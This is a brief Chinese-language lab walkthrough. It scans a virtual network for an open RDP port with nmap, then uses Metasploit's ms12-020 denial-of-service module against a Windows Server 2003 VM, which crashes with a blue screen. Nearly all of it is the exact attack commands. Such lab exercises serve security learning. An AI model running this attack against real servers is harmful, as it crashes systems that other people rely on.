首先将kali与Windows_2003_server
用NAT模式连接。
Windous打开远程控制 右键“我的电脑”--“属性”--”远程” 把远程协助与远程桌面都打开。
使用ifconfig命令查看本机IP地址。
在Windous中用 WIN+R
输入cmd
ipconfig查看Ip
使用命令 nmap -p 3389 192.168.***.0/24 搜索3389端口是否打开
发现windous的打开了
启动Metasploit
search ms12-020
利用1模块 auxiliary/dos/windows/rdp/ms12_020_maxchannelids
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set rhost 192.168.***.***(windous IP)
然后 run
查看windous机 发现蓝屏